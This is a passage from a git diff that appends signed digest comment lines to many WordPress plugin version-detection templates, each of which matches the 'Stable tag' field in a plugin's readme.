4a0a00473045022057b05e8d4bbc7b17729aada433ceae381540fc37ce01023005cb022b77dd9400022100a85121878eb220ca0ec79bf7f41bfdaa975bca52bdda1f224e770a188c17253f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 27e45e39ca..ef82cb2e72 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8913f0ee47b99ab9aaaa9e5b5217fd0e802b802eb51d5bfd5b05d4d7c443d26022100871aa575de40dff9eaadd029023d4f0b7747c8a603b8dc6762840c6129383048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..477804ae27 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200b47fefe89f6c986cc4b346b3fcde2cf4b0e1dedd3c775ad94672c98d990525d0220709eaeee01ed1f471d0f5012004cd5c4e3adcdeee8789333b84b4444c582f84d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index d679d8df61..7f4616fb26 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100db5acf7df6054a4621b085a4eced3e837079afae6220ad17f73ef6e888e8d201022100b0b3ea190defababdba891edba2b8db4b78512a980d1252e3f5012a529c4d66a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 8bfe16ca84..12b92ffb08 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000d39c581908507b8827a2422e2bdc3a7311bc7e3ff795e13f87306a25d4f45a022044343a28b9ece7f98b90763dd907c91502af6928cd21dec83ad9694a5961fca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..37b62896be 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd4438e860e564ba1426cfe9f2a779072de1f1dd53c7b84927a819ff6c19dbf80220137f0d1bf901799935f0fbb113ba61ddee120c6f7f5aa1382a43ef7f6c0d7279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..546f249bee 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c995d98332da4f61429f047907faaa8eada354992cb8d0502ce7a032b922138f022100e69becd3bac38245747208a1c2ded3a3a4918b6e909791dfd401ea9b87ae47f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..ff826b7808 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a3f91e99e9453f7e00a5cb01feb488dbac16f135fab611095663b7ef25cb278002205091b0a34d3800dbce35ceac12ec6b500163211b759d2bec99d3c74ae989c3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..d7ea3e9053 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087ed2350e61eeacd777504141a886cc60e0d4d3d38ebd940715b4de48cce311f0221008f877211200aa96cd5a55fa2be66cf74fda5bf83d0fdddc8be33513f264cbc77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 67968fb008..be50d04889 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a26c1fd36e8f247b9887bb784796ee060c10297c5c41b4e88bf759e9202613f7022100eaf92ed75b6543ee8e80c0f61c11262b34ac17a9a23cb65c468097e70372c0e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..81e2f175ba 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bcb027f1540bf95aaa244f559a242da84d6273b3bbd8f4df15ff2f492bbea36f022100cba6619db460ef15d801466be8c58d5c0e0bea9850790b4570b8f99772c85c85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..3dccc830f9 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a9811a6437809e2ec4277cd4a3798e2a9e45ac5176a76e4ce2341c42d8c99a9f0220289835b6cde0c013801ee7b338f96df66b1b89c25461d47ba5471bc6f5b95aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..10f5d84b14 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022064d77ced4f403d87b5068b5aa403669f7cef151485a3f1f419535e1d8d0c3a5c0221008d2e10491dfe98979489ce7c6fc81509888a2a753a8dab042e061f2d4ed2281c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index d22f60a5cd..457b707f89 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022014504b311f8b0b5898436afebfe310307e4f224ad7f1c141206ad61a9480cb6a022100cf75e8c98dc8ab81a82db7e13c1b9bee9e3bc219994fb92cc48c435ff7145e09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..a563f0a7d1 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022020be69c975d57a720a526ccb7510bbca7b6b1b3eecf1e235ebc999b9dc6cebc2022100d9607f4082f1040d2532ec255bb0c54a1e6e836a162d133b8bb0744afe57c63e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 2d4f463d97..876235984f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b2470525bd67215bb801ffa3369b212d84533e54a78df83788ea5aa5d17b8087022100ad5a4c1f53ea4491636a51433dc398452b7b7a2055e3e3f944f19ed854fef67b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index cb67671918..3b3895ed32 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb01cf65598d3b47dc6c79361ded7fe3581ff3e73bc3c662891fbf3ada71757f022100fe04c44cfacd75f71fce626ddbc9949705676540ab8b591535a021171b748d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index cc3eb2481a..a5fb18fbcb 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a579abde215444b7e496ceafec5d79b6a1b96e1f7184a24a0eca05c61f8f66b2022012f39a378d50e6bf152abf42b12ca4f469cdbecdd3da547c48418fff02f775f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..d82f53f4ba 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100883d92044dd6a94b69457acb84aa9c40c02034b0c87e315fd2e4ba5e4e158de8022019665cebd74187a9bf3dc63996a15e3ecd8d0634a8a1b8ae58cdf8b06f5afd2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..8d472d7557 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee789896a25df7caa1bdd5d0ace9713d03af70e56b260cdd19f74cde71187642022100e1ebb9fed460386078f1afb67624da01055ab8d117451c0b492a6e79ce73da7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..aa18d671a8 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d25d405fb19c7fc7735684d3409cad404c05496aa1886fbd655fc7646d2d9c970221008f85d37218c9372ed0c9104dcd2898fa76761c732ac2dbaaf2a3c9ddb731e5e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index a33aa7964f..46fc06b834 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220172766bb24a58830a55b6e93be3237a04db0d175903559be7130e388c2a6291a02207e2140a14c24971855ddd46a5700e69ed10c929db2d8560a63d3c357643847dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3ffdc721c2 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205e46bb34cc3be4cff1618b654d370ec7cab72054cd6dab7307d1e65bbda5ac0b02202fd2be1933a582bcabb1868e729887ee93f7d0f223d7084f1071291ccfe430a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..bcc64e2c86 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204663fa4b904c3ab4bfd854b5436ce7ab9d84aa34cde7e1c242b5776b3eff8092022100e89b4dddf2a12197c0db54664ed161edc756ba1e640b9e5e1c638e2f777250ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..e07ba852b0 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202bca171b4d0eed5b865ff872e22787f6896157769a67c01ceedbbf6ea215cb5b022074ec16ce084839b0e87adab0e3b7bcdf9fd07fc27e7b39a5dfb104492853dc4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 69c367b8d5..d8594e883b 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205afed6bf7d13bc163678516b530fccbec8766bdd6044990ee69567933703a6d8022100d24d3aaf526b7f0b6175bb1233eae30b7a8365cead315d4cfac3adb0510fcf4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 7776b209df..cfb75dfa3f 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100deab2e5a71950d92c1e6262d1f55f3ab7fd7e5257ffd02dccafcc2811050cc8f022100980f650bf824b37d6db559ca5baf49ae6ad3a02395c92e1ac034dd406645e2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..d253fc022f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100edd1b2432bb435712bb3c836ee03e269f042ff144b4d79458773e9add141b5a802205d5a1b94a0c762c6b7d0dcc4a63c599b769b7d6ea91ba47b220f486edd615d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..4a2b6d610a 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8b879cd645249dd2ee876486a50272f1844f58514e01ba7bd03f3b6b3d1fcd702210084aa3a7147a2eba6948c392c8390010a3c636df1f187b7768bd3d4edc01c0066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..c370c78fbe 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b2a76aa52da2394b191b4951cf7bccbdce320f81dc091e04a2d82c916174b08022100ff30c876db711adb6909d28aa62286706910297075c05a4eac294a4a70643ce4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..b6948cb713 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206d99f3cbe7c4013e83bba3c9a4a34d35c36f443d023b7a6bfe3d516f67d4d5d002202c102a82e50d14d9a71185b450a07a8a33ff70cf4a6746f492f15b6d9c111c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..e1d89d6d05 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200acd5862550cecad68cb8353a5b2bb7746b2c1f161c479359c2eaa5d7cb6139f02207c1add55c58b1426b23e68cdb0ae6332dddf09d4b4a41147d5d980a3ea64934f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..54f3268f0b 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e415f670340d9fca34aff252f4c8a6f2bc5bba26b6d7e4e49e040852d299ae6b02201b0723eb6133a8b5af08edf5c446ed9eb838a4e427312f2217de132545c0cad4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 9d77ce9155..89cb27d946 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220341e4289c3257b918eea32ef69e4bbd2e388fd995d77bdc1b2047feae599bc860220391529b56f9b30230b83fc782c0bec37dd46e980aab3cfe37b762ec2d0f80b3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..30e908afe6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022061e25686ccff53a8bf2b1a4bb9851d816d5912c4928c6c36ee70f6032a35a14002207a6d45b60610de9fb27c8d4e81df148d41fff0e4152e310c6c4264582ea2d615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..8672e953b5 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d4960695e8c2588e7af087a583f8250eb1dc4188f44d69028b151f49ae6a00502201e1ff059971e64fc4f22da8c9ce276e4f86685a0a62feebb59b2bcc3f26172da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..419fd4b6d9 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc2579b25352d295dfeba7ab534b05f2093f99d5af1dce561eee85fafb7bd332022035fb5513f0b92fd00cd19870b2933fac70fa94cacbcfe56dc229a8f573d04cba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 34d36d4349..a60ef7661c 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ead196d00f8dc43320e34562e6ef4ef16b0e5d145f953069c77d9a8b8f819fc0220721b7a84d1d5028044370cb3357b7ca39ad3e58a20e0e424aae4f016080a8738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..f8b1b42315 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100faa55d1d77b85d43401a146dad83955b391766cedb6b7d7449c248e036c2a5b502205d94884e91e8c1861985be7f310c8ca9ce825197ea17311662526fa34c0284fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 39b176dcb8..d7934fefef 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b08a023f66d9f83a43d7459074d4099eac6d09cfe00c52b5c92a2d5898c5d22102202ba836b6d71afee558cf7742aca2fcdf4b5a2a437a64ce50ae882b3d569f111d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..2d35410f08 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200798057b7960606385653864c124b27e162564913101a35568157e1d27411a4002202fcd1b372f36e6c2313361c16bb0716faecf8cf94ea6daeb104e0933411fadc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..dafd27c34d 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a93b53d7bfd4017d9e3c05a1075a19cf0daffb1e5603d7a773d718e1537011ca022038b8798d545151796a0e8a4d0ad01e164a6293204f2ab76cc0c636ca5adcd7dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..a680fa6d4e 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f88b1e36e7326b1a9e06c83f1a5e4de662e2fb00618a085892b5085dce4785102203561039cfebf0a3c46c66f9061c5679c746295f99f3dadd27f94173342a72f4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..5b9bf4287d 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c18d5186ffbed861e87d94241d86a6b9d2f3ad5e447d049d5f924384f0414955022056fe6f2ec0bdb7d2d7656902372a4b08ec14190ab6c7256f3cc3d80a599da268:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..bee355e205 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206c01bf5f8c85d3d72d361980a128911f80de4f2141af7aea7ad248b603d7ff76022100b00b40542320f66845dfc78c87de4d6a169426a6c41d4b66d2c3f83c35a6beb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..4952e6f761 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd5273276cc90fbb2d626f57bdb8e3af814bcc9c7818d2306a3a16c35f61516d022054660e1c09e33193ca77a7bc75de931fcfac2fe9cf723bed72f9abed3ea87b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cb5e905997 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e54cae1d5406a8a3ea3d0b67fed68a79cd68f8a9a3cac7cb6e61760c1914ff1e02201f7a0f232c92513ad9715bd32500168adacc05bb8b33651b6d928578fb82831a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..6505f59fc6 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ 